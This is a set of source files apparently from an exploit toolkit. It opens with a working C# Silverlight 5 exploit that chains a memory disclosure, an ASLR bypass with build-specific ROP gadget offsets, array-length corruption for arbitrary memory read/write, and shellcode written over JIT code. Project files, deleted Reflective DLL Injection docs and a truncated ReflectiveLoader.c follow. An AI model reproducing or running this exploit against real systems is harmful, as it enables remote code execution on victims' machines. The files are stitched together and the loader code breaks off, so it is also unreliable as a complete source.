public static ulong ReadAddr(byte[] b, int offs)
{
ulong u = 0;
for(int i=offs, j=0; i < offs + (is64 ? 8:4); i++, j+=8) u += ((ulong)b[i]) << j;
return u;
}
// writes pointer into byte[]
public static void WriteAddr(byte[] b, int offs, ulong u)
{
for (int i = offs; i < offs + (is64 ? 8:4); i++, u >>= 8)
b[i] = (byte)(u & 0xff);
}
// exploits memory disclosure in BitmapSource.SetSourceInternal()
ulong MemoryDiscl()
{
try
{
// prepare malicious MemoryStream
MyStream ms = new MyStream();
// create image based on stream data and data "outside" the stream
BitmapImage bi = new BitmapImage();
ms.offs = 39; // set offset for 32 bit environment
bi.SetSource(ms); // call the vulnerable SetSourceInternal()
// check png data parsing results
is64 = bi.PixelWidth == 0 || bi.PixelHeight == 0;
if (is64) { // error, ok lets try again with the offset for 64 bit
ms.offs = 79;
bi.SetSource(ms);
}
// check png data parsing results
if (bi.PixelWidth == 0 || bi.PixelHeight == 0) throw new Exception("Bad PNG data"); // error png parsing
// ok, now we should pass the diclosed memory into WriteableBitmap to access it as RGB pixel data
WriteableBitmap wb = new WriteableBitmap(bi);
LogAdd(wb);
// read pixels from image
int[] p = wb.Pixels;
int len = p.Length;
LogAdd(String.Format("pixels available to read: {0}", len));
string s = " ";
for (int i = 0; i < len; i++) {
s = p[i].ToString("X").Substring(2);
LogAdd(String.Format("pixel[{0}] = {1}", i, s));
}
// convert int[] to byte[]
byte[] b = new byte[len * 3];
int k;
for (int i = is64 ? 5:2, j=0; i < len; i++, j+=3)
{
k = p[i] & 0xffffff;
b[j + 2] = (byte)(k & 0xff); k >>= 8;
b[j + 1] = (byte)(k & 0xff); k >>= 8;
b[j + 0] = (byte)(k & 0xff); k >>= 8;
}
// parse memory addresses from b[]
ulong hMod = ReadAddr(b, is64 ? 0:1); // type pointer for obj[] // we'll need it for mscorlib.ni.dll image base calculation for the ASLR bypass
ulong addr1 = ReadAddr(b, is64 ? 24:13); // obj[0] = address of png[]
bufAddr = ReadAddr(b, is64 ? 32:17); // obj[1] = address of MainPage.inst.buf[]
LogAdd("obj[] type = " + Hex(hMod) + ", png[] address = " + Hex(addr1) + ", buf[] address = " + Hex(bufAddr));
// calc the ROP offset inside mscorlib.ni.dll
// * x86
// 7997526b 83493440 or dword ptr [ecx+34h],40h
// 7997526f b801000000 mov eax,1
// 79975274 c20400 ret 4
// * x64
// 000007fe`f03e19d0 895168 mov dword ptr [rcx+68h],edx
// 000007fe`f03e19d3 c3 ret
if (Environment.OSVersion.Platform != PlatformID.Win32NT) throw new Exception("Sorry, but the further code works for Windows only.");
ulong rop = 0;
if (vsn.Major == 5 && vsn.Build == 10411)
{
rop = (hMod & 0xffffffffffff0000) - (ulong)(is64 ? 0x670000 - 0x4519D0 : 0x470000 - 0x2A526B);
}
else if (vsn.Major == 5 && vsn.Build == 61118)
{
rop = (hMod & 0xffffffffffff0000) - (ulong)(is64 ? 0x670000 - 0x4519D0 : 0x470000 - 0x2A520F);
}
if (rop == 0) throw new Exception("Sorry, but the further code works for vulnerable 5 builds only.");
// calc object pointer offset inside png2[]
ulong addr2 = bufAddr - (ulong)(is64 ? 96:45);
k = (int)(addr2 - addr1) - (is64 ? 16:8);
// write vtable pointer
WriteAddr(ms.png, k, addr2);
// write address of ROP gadget
WriteAddr(ms.png, k + (is64 ? 8:4), rop);
// ok, return the pointer for ScriptObject.Initialize() exploitation
return addr2;
}
catch (Exception ex)
{
LogAdd("Error: " + ex.ToString());
}
return 0;
}
class ShellHelper32 : Random
{
// x32 shellcode
uint[] payload;
// PreCondition : arr.Lenth % 4 == 0
public virtual void SetPayload(byte[] arr)
{
payload = new uint[arr.Length / 4];
for (int i = 0, k = 0; i < arr.Length; i += 4, k += 1)
{
payload[k] = BitConverter.ToUInt32(arr, i);
}
}
// read uint from memory address
uint Get(uint addr)
{
if (addr > 0x10000) return buf[(addr - (uint)bufAddr - 8) >> 2]; else return 0;
}
// write uint into memory address
void Set(uint addr, uint val)
{
if (addr > 0x10000) buf[(addr - (uint)bufAddr - 8) >> 2] = val;
}
// exchange two uint arrays
void Exchange(uint addr, uint[] arr)
{
uint u;
int len = arr.Length;
for (int i=0; i < len; i++, addr += 4) {
u = Get(addr); Set(addr, arr[i]); arr[i] = u;
}
}
// declare virtual function for the further DEP bypass
public virtual int Payload()
{
// generate dummy JIT-code
if (this == null) LogAdd(ToString());
if (this == null) LogAdd(ToString());
if (this == null) LogAdd(ToString());
if (this == null) LogAdd(ToString());
if (this == null) LogAdd(ToString());
LogAdd("Payload() hit!");
return 0;
}
public virtual void Exec(int oldLen)
{
try {
// generate JIT-code for Payload()
Payload();
// save pointers within obj[] array after buf[]
obj[0] = buf;
obj[1] = this;
// find obj[] array and "this" pointer after buf[]
uint addr = 0;
for (int i = 2; i < 64; i++)
if (buf[i] == (uint)bufAddr) { addr = buf[i+1]; break; }
if (addr == 0) throw new Exception("Can't find obj[]");
// get (this.type + 2c) -> (vtable + 8) -> Payload() address
addr = Get(Get(Get(addr) + 0x2c) + 8);
//for (uint i = 0; i < 16; i++) LogAdd(Hex(Get(addr + i*4))); // for RnD
LogAdd("Payload() address = " + Hex(addr));
if (addr == 0) throw new Exception("Can't find Payload() address");
// copy payload over JIT-code memory
addr -= addr % 4;
Exchange(addr, payload);
uint contents = Get(addr);
LogAdd("Payload() Address " + Hex(addr) + ", Contents: " + Hex(contents));
LogAdd("Executing payload...");
// exec payload
int res = Payload();
// restore JIT memory
//Exchange(addr, payload);
LogAdd("Payload() returns " + Hex(res));
}
catch (Exception ex) {
LogAdd("Error: " + ex.ToString());
}
// restore buf[] length
buf[0x40000000-1] = (uint)oldLen;
LogAdd("buf.Length = " + Hex(buf.Length));
}
}
class ShellHelper64 : ShellHelper32
{
// x64 shellcode
byte[] payload;
public override void SetPayload(byte[] arr)
{
payload = new byte[arr.Length];
for (int i = 0; i < arr.Length; i += 1)
{
payload[i] = arr[i];
}
}
UnmanagedMemoryStream ums;
ulong umsAddr;
byte[] bb;
// read ulong from x64 memory address
ulong Get(ulong addr)
{
if (addr < 0x10000) return 0;
addr = (addr - bufAddr - 8) >> 2;
return ((ulong)buf[addr+1] << 32) + buf[addr];
}
// write ulong into x64 memory address
void Set(ulong addr, ulong val)
{
if (addr < 0x10000) return;
addr = (addr - bufAddr - 8) >> 2;
buf[addr] = (uint)val;
buf[addr+1] = (uint)(val >> 32);
}
// read ulong from x64 memory address using ums
ulong Read(ulong addr)
{
if (addr < 0x10000) return 0;
// set ums._mem pointer
Set(umsAddr + 8, addr);
// read ulong from ums
ums.Position = 0;
ums.Read(bb, 0, 8);
return ReadAddr(bb, 0);
}
// write ulong into x64 memory address using ums
void Write(ulong addr, ulong val)
{
if (addr < 0x10000) return;
// set ums._mem pointer
Set(umsAddr + 8, addr);
// write ulong into ums
ums.Position = 0;
WriteAddr(bb, 0, val);
ums.Write(bb, 0, 8);
}
// exchange two byte[] arrays
void Exchange(ulong addr, byte[] arr)
{
int len = arr.Length;
byte[] b = (byte[])arr.Clone();
// set ums._mem pointer
Set(umsAddr + 8, addr);
// read byte[] from ums
ums.Position = 0;
ums.Read(arr, 0, len);
// write byte[] into ums
ums.Position = 0;
ums.Write(b, 0, len);
}
public override void Exec(int oldLen)
{
try {
// generate JIT-code for Payload()
Payload();
// create UnmanagedMemoryStream
ResourceManager rm = new ResourceManager("System.Windows.g", typeof(Control).Assembly);
ums = rm.GetStream("themes/generic.xaml");
LogAdd(ums);
if (ums == null) throw new Exception("Can't find themes/generic.xaml");
// save pointers within obj[] array after buf[]
obj[0] = buf;
obj[1] = this;
obj[2] = ums;
// find obj[] array after buf[]
ulong addr = 0;
for (int i = 3; i < 64; i++)
if (buf[i] == (uint)bufAddr) {
addr = ((ulong)buf[i+3] << 32) + buf[i+2];
umsAddr = ((ulong)buf[i+5] << 32) + buf[i+4];
// ensure that ums was allocated after buf[]
for (int j = 0; j < 100 && bufAddr > umsAddr; j++) {
ums = rm.GetStream("themes/generic.xaml");
obj[2] = ums;
umsAddr = ((ulong)buf[i+5] << 32) + buf[i+4];
}
break;
}
if (addr == 0) throw new Exception("Can't find obj[]");
LogAdd("ums address = " + Hex(umsAddr));
if (bufAddr > umsAddr) throw new Exception("Can't allocate ums after buf[]");
//for (uint i = 0; i < 10; i++) LogAdd(Hex(Get(umsAddr+i*8))); // for RnD
// set ums._access private field to FileAccess.ReadWrite = 3
Set(umsAddr + 6*8, 0x300000003);
LogAdd("ums.Length = " + ums.Length + ", CanRead = " + ums.CanRead + ", CanWrite = " + ums.CanWrite + ", CanSeek = " + ums.CanSeek);
if (!ums.CanRead || !ums.CanWrite) throw new Exception("Can't access ums");
// ok, we have UnmanagedMemoryStream with controlable private fields,
// so we can set any custom ums._mem pointer and read/write data starting from this pointer
// get (this.type + 72) -> (vtable + 16) -> Payload() address
bb = new byte[8];
addr = Read(Read(Read(addr) + 9*8) + 16);
//for (uint i = 0; i < 16; i++) LogAdd(Hex(Read(addr + i*8))); // for RnD
LogAdd("Payload() address = " + Hex(addr));
if (addr == 0) throw new Exception("Can't find Payload() address");
// copy payload over JIT-code memory
Exchange(addr, payload);
// exec payload
int res = Payload();
// restore JIT memory
//Exchange(addr, payload);
LogAdd("Payload() returns " + Hex(res));
}
catch (Exception ex) {
LogAdd("Error: " + ex.ToString());
}
// restore buf[] length
if (bb != null) {
Write(bufAddr + 8, (ulong)oldLen);
LogAdd("buf.Length = " + Hex(buf.Length));
}
}
}
void exploit()
{
try
{
LogAdd("------------ START ------------");
// prepare pointer for ScriptObject.Initialize()
ulong h = MemoryDiscl();
LogAdd("handle = " + Hex(h));
if (h == 0) throw new Exception("Something is wrong with the memory disclosure");
// save old length
int oldLen = buf.Length;
LogAdd("buf.Length = " + Hex(oldLen));
// call ScriptObject.Initialize() and cause the buf.Length corruption
MyObject mo = new MyObject();
mo.Init((IntPtr)h); // call agcore.dll DOM_ReferenceObject(h)
// check results
int len = buf.Length;
LogAdd("buf.Length = " + Hex(len));
if (len == oldLen) throw new Exception("Something is wrong with buf.Length");
// ok, now we have an uint[] array with Length > 0x40000000, so we can read/write arbitrary memory addresses on x32,
// but this is not allways enough for x64. So for 64-bit we have to use different technique to gain the true "god mode".
ShellHelper32 sh;
if (is64)
{
sh = new ShellHelper64();
sh.SetPayload(payload);
}
else
{
sh = new ShellHelper32();
sh.SetPayload(payload);
}
// execute payload
sh.Exec(oldLen);
LogAdd("------------ END ------------");
}
catch (Exception ex)
{
LogAdd("Error: " + ex.ToString());
}
}
void btnClickMe_Click(object sender, RoutedEventArgs e)
{
#if DEBUG
exploit();
#endif
}
}
}

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<Deployment xmlns="http://schemas.microsoft.com/client/2007/deployment"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
>
<Deployment.Parts>
</Deployment.Parts>
</Deployment>

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using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("SilverApp1")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("Microsoft")]
[assembly: AssemblyProduct("SilverApp1")]
[assembly: AssemblyCopyright("Copyright © Microsoft 2011")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("2b886857-ef39-4df1-9815-19a050632476")]
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Revision and Build Numbers
// by using the '*' as shown below:
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]

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<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProductVersion>8.0.50727</ProductVersion>
<SchemaVersion>2.0</SchemaVersion>
<ProjectGuid>{D33B3660-E6CA-4B29-9E09-0DF99B28840E}</ProjectGuid>
<ProjectTypeGuids>{A1591282-1198-4647-A2B1-27E5FF5F6F3B};{fae04ec0-301f-11d3-bf4b-00c04f79efbc}</ProjectTypeGuids>
<OutputType>Library</OutputType>
<AppDesignerFolder>Properties</AppDesignerFolder>
<RootNamespace>SilverApp1</RootNamespace>
<AssemblyName>SilverApp1</AssemblyName>
<TargetFrameworkIdentifier>Silverlight</TargetFrameworkIdentifier>
<TargetFrameworkVersion>v5.0</TargetFrameworkVersion>
<SilverlightVersion>$(TargetFrameworkVersion)</SilverlightVersion>
<SilverlightApplication>true</SilverlightApplication>
<SupportedCultures>
</SupportedCultures>
<XapOutputs>true</XapOutputs>
<GenerateSilverlightManifest>true</GenerateSilverlightManifest>
<XapFilename>SilverApp1.xap</XapFilename>
<SilverlightManifestTemplate>Properties\AppManifest.xml</SilverlightManifestTemplate>
<SilverlightAppEntry>SilverApp1.App</SilverlightAppEntry>
<TestPageFileName>SilverApp1TestPage.html</TestPageFileName>
<CreateTestPage>true</CreateTestPage>
<ValidateXaml>true</ValidateXaml>
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@ -1,25 +0,0 @@
Copyright (c) 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted
provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of
conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of
conditions and the following disclaimer in the documentation and/or other materials provided
with the distribution.
* Neither the name of Harmony Security nor the names of its contributors may be used to
endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.

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@ -1,71 +0,0 @@
About
=====
Reflective DLL injection is a library injection technique in which the concept
of reflective programming is employed to perform the loading of a library from
memory into a host process. As such the library is responsible for loading
itself by implementing a minimal Portable Executable (PE) file loader. It can
then govern, with minimal interaction with the host system and process, how it
will load and interact with the host.
Injection works from Windows NT4 up to and including Windows 8, running on x86,
x64 and ARM where applicable.
Overview
========
The process of remotely injecting a library into a process is two fold. Firstly,
the library you wish to inject must be written into the address space of the
target process (Herein referred to as the host process). Secondly the library
must be loaded into that host process in such a way that the library's run time
expectations are met, such as resolving its imports or relocating it to a
suitable location in memory.
Assuming we have code execution in the host process and the library we wish to
inject has been written into an arbitrary location of memory in the host
process, Reflective DLL Injection works as follows.
* Execution is passed, either via CreateRemoteThread() or a tiny bootstrap
shellcode, to the library's ReflectiveLoader function which is an exported
function found in the library's export table.
* As the library's image will currently exists in an arbitrary location in
memory the ReflectiveLoader will first calculate its own image's current
location in memory so as to be able to parse its own headers for use later on.
* The ReflectiveLoader will then parse the host processes kernel32.dll export
table in order to calculate the addresses of three functions required by the
loader, namely LoadLibraryA, GetProcAddress and VirtualAlloc.
* The ReflectiveLoader will now allocate a continuous region of memory into
which it will proceed to load its own image. The location is not important as
the loader will correctly relocate the image later on.
The library's headers and sections are loaded into their new locations in
memory.
* The ReflectiveLoader will then process the newly loaded copy of its image's
import table, loading any additional library's and resolving their respective
imported function addresses.
* The ReflectiveLoader will then process the newly loaded copy of its image's
relocation table.
* The ReflectiveLoader will then call its newly loaded image's entry point
function, DllMain with DLL_PROCESS_ATTACH. The library has now been successfully
loaded into memory.
* Finally the ReflectiveLoader will return execution to the initial bootstrap
shellcode which called it, or if it was called via CreateRemoteThread, the
thread will terminate.
Build
=====
Open the 'rdi.sln' file in Visual Studio C++ and build the solution in Release
mode to make inject.exe and reflective_dll.dll
Usage
=====
To test use the inject.exe to inject reflective_dll.dll into a host process via
a process id, e.g.:
> inject.exe 1234
License
=======
Licensed under a 3 clause BSD license, please see LICENSE.txt for details.

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@ -1,20 +0,0 @@

Microsoft Visual Studio Solution File, Format Version 10.00
# Visual C++ Express 2008
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Release|Win32 = Release|Win32
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EndGlobalSection
EndGlobal

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<Command>copy ..\ARM\Release\reflective_dll.arm.dll ..\bin\</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>true</IntrinsicFunctions>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PreprocessorDefinitions>WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;WIN_X64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<CompileAs>CompileAsCpp</CompileAs>
</ClCompile>
<Link>
<OutputFile>$(OutDir)$(ProjectName).x64.dll</OutputFile>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<TargetMachine>MachineX64</TargetMachine>
</Link>
<PostBuildEvent>
<Command>copy $(OutDir)$(ProjectName).x64.dll ..\bin\</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="src\ReflectiveDll.c" />
<ClCompile Include="src\ReflectiveLoader.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="src\ComplexPath.h" />
<ClInclude Include="src\ReflectiveDLLInjection.h" />
<ClInclude Include="src\ReflectiveLoader.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

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@ -1,32 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="src\ReflectiveDll.c">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="src\ReflectiveLoader.c">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="src\ReflectiveDLLInjection.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="src\ReflectiveLoader.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="src\ComplexPath.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
</Project>

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@ -1,51 +0,0 @@
//===============================================================================================//
// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
#define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
// we declare some common stuff in here...
#define DLL_QUERY_HMODULE 6
#define DEREF( name )*(UINT_PTR *)(name)
#define DEREF_64( name )*(DWORD64 *)(name)
#define DEREF_32( name )*(DWORD *)(name)
#define DEREF_16( name )*(WORD *)(name)
#define DEREF_8( name )*(BYTE *)(name)
typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID );
typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
#define DLLEXPORT __declspec( dllexport )
//===============================================================================================//
#endif
//===============================================================================================//

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//===============================================================================================//
// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#include "ReflectiveLoader.h"
//===============================================================================================//
// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
HINSTANCE hAppInstance = NULL;
//===============================================================================================//
#pragma intrinsic( _ReturnAddress )
// This function can not be inlined by the compiler or we will not get the address we expect. Ideally
// this code will be compiled with the /O2 and /Ob1 switches. Bonus points if we could take advantage of
// RIP relative addressing in this instance but I dont believe we can do so with the compiler intrinsics
// available (and no inline asm available under x64).
__declspec(noinline) ULONG_PTR caller( VOID ) { return (ULONG_PTR)_ReturnAddress(); }
//===============================================================================================//
// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,
// otherwise the DllMain at the end of this file will be used.
// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
// otherwise it is assumed you are calling the ReflectiveLoader via a stub.
// This is our position independent reflective DLL loader/injector
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
#else
DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( VOID )
#endif
{
// the functions we need
LOADLIBRARYA pLoadLibraryA = NULL;
GETPROCADDRESS pGetProcAddress = NULL;
VIRTUALALLOC pVirtualAlloc = NULL;
NTFLUSHINSTRUCTIONCACHE pNtFlushInstructionCache = NULL;
USHORT usCounter;
// the initial location of this image in memory
ULONG_PTR uiLibraryAddress;
// the kernels base address and later this images newly loaded base address
ULONG_PTR uiBaseAddress;
// variables for processing the kernels export table
ULONG_PTR uiAddressArray;
ULONG_PTR uiNameArray;
ULONG_PTR uiExportDir;
ULONG_PTR uiNameOrdinals;
DWORD dwHashValue;
// variables for loading this image
ULONG_PTR uiHeaderValue;
ULONG_PTR uiValueA;
ULONG_PTR uiValueB;
ULONG_PTR uiValueC;
ULONG_PTR uiValueD;
ULONG_PTR uiValueE;
// STEP 0: calculate our images current base address
// we will start searching backwards from our callers return address.
uiLibraryAddress = caller();
// loop through memory backwards searching for our images base address
// we dont need SEH style search as we shouldnt generate any access violations with this
while( TRUE )
{
if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE )
{
uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
// we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 )
{
uiHeaderValue += uiLibraryAddress;
// break if we have found a valid MZ/PE header
if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE )
break;
}
}
uiLibraryAddress--;
}
// STEP 1: process the kernels exports for the functions our loader needs...
// get the Process Enviroment Block
#ifdef WIN_X64
uiBaseAddress = __readgsqword( 0x60 );
#else
#ifdef WIN_X86
uiBaseAddress = __readfsdword( 0x30 );
#else WIN_ARM
uiBaseAddress = *(DWORD *)( (BYTE *)_MoveFromCoprocessor( 15, 0, 13, 0, 2 ) + 0x30 );
#endif
#endif
// get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
uiBaseAddress = (ULONG_PTR)((_PPEB)uiBaseAddress)->pLdr;
// get the first entry of the InMemoryOrder module list
uiValueA = (ULONG_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
while( uiValueA )
{
// get pointer to current modules name (unicode string)
uiValueB = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
// set bCounter to the length for the loop
usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
// clear uiValueC which will store the hash of the module name
uiValueC = 0;
// compute the hash of the module name...
do
{
uiValueC = ror( (DWORD)uiValueC );
// normalize to uppercase if the madule name is in lowercase
if( *((BYTE *)uiValueB) >= 'a' )
uiValueC += *((BYTE *)uiValueB) - 0x20;
else
uiValueC += *((BYTE *)uiValueB);
uiValueB++;
} while( --usCounter );
// compare the hash with that of kernel32.dll
if( (DWORD)uiValueC == KERNEL32DLL_HASH )
{
// get this modules base address
uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
// get the VA of the modules NT Header
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
// get the VA for the array of name pointers
uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
// get the VA for the array of name ordinals
uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
usCounter = 3;
// loop while we still have imports to find
while( usCounter > 0 )
{
